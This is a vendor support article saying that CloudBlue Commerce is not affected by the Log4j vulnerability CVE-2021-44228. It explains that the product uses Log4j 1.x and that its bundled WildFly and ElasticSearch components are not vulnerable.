Question
Is CloudBlue Commerce affected by CVE-2021-44228?
General description of the vulnerability
CVE-2021-44228 : The Apache log4j library allows for developers to log various data within their application. In certain circumstances, the data being logged originates from user input. Should this user input contain special characters and be subsequently logged within the context of log4j, the Java method lookup will finally be called to execute the user-defined remote Java class in the LDAP server. This will in turn lead to RCE on the victim server that uses the vulnerable log4j 2 instance.
Answer
As official stated by CloudBlue Application Security team, all supported CloudBlue Commerce versions are not vulnerable to CVE-2021-44228 since:
- Log4j 1.x version is not vulnerable as does not offer a look up mechanism. So it does not suffer from CVE-2021-44228. Commerce platform v20.x and v21.x contains Log4j 1.x version in the aps-tools package, which is a part of Branding-UI component.
- Commerce platform also uses WildFly and ElasticSearch, which contain Log4j package, but both of them are not vulnerable according to the following statements:
- The updated version of Log4j library with fixed vulnerability is planned to be delivered in scope of OA-26453